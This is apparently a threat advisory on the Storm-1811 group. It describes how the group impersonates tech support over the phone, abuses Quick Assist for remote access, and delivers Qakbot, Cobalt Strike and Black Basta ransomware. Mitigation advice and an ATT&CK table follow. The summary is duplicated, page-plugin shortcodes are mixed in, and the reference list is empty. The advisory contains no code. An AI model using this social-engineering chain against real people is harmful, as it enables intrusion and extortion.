EXECUTIVE SUMMARY
Researchers have recently observed the cybercriminal group Storm-1811 exploiting the client management tool Quick Assist in their social engineering attacks. Known for deploying Black Basta ransomware, Storm-1811 begins their campaign with voice phishing (vishing) to impersonate trusted entities such as Microsoft technical support or company IT professionals. This is followed by the delivery of malicious tools, including ScreenConnect and NetSupport Manager, alongside malware like Qakbot and Cobalt Strike, which ultimately leads to the deployment of Black Basta ransomware.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
Researchers have recently observed the cybercriminal group Storm-1811 exploiting the client management tool Quick Assist in their social engineering attacks. Known for deploying Black Basta ransomware, Storm-1811 begins their campaign with voice phishing (vishing) to impersonate trusted entities such as Microsoft technical support or company IT professionals. This is followed by the delivery of malicious tools, including ScreenConnect and NetSupport Manager, alongside malware like Qakbot and Cobalt Strike, which ultimately leads to the deployment of Black Basta ransomware.[emaillocker id="1283"]
Storm-1811 leverages Quick Assist's functionality to gain unauthorized access to users' devices. Through vishing attacks, they persuade targets to initiate Quick Assist sessions, often under the guise of resolving technical issues. Once connected, the threat actors request control over the device, enabling them to execute malicious scripts via cURL commands to download and install various malware components. These components include Qakbot, which serves as a conduit for further malicious payloads, and remote monitoring tools like ScreenConnect and NetSupport Manager, which facilitate persistence and lateral movement within the compromised environment. The final stage involves deploying Cobalt Strike for hands-on-keyboard activities, culminating in the distribution of Black Basta ransomware using tools like PsExec.
To mitigate the threat posed by Storm-1811, organizations are advised to consider blocking or uninstalling Quick Assist and similar remote management tools if they are not essential. Educating users about the risks of tech support scams and ensuring they only initiate Quick Assist sessions with verified support contacts can significantly reduce the risk of compromise. Additionally, leveraging advanced anti-phishing solutions, enabling network protection features, and maintaining up-to-date security defenses, are crucial steps in safeguarding against this threat. By focusing on the stages leading up to ransomware deployment, organizations can effectively reduce the likelihood of successful attacks.
THREAT PROFILE:
| Tactic | Technique Id | Technique |
| Initial Access | T1566 | Phishing |
| Execution | T1059 | Command and Scripting Interpreter |
| Privilege Escalation | T1078 | Valid Accounts |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Discovery | T1016 | System Network Configuration Discovery |
| Lateral Movement | T1021 | Remote Services |
| Collection | T1056 | Input Capture |
| Command and Control | T1071 | Application Layer Protocol |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
| Impact | T1486 | Data Encrypted for Impact |
REFERENCES:
The following reports contain further technical details:
[/emaillocker]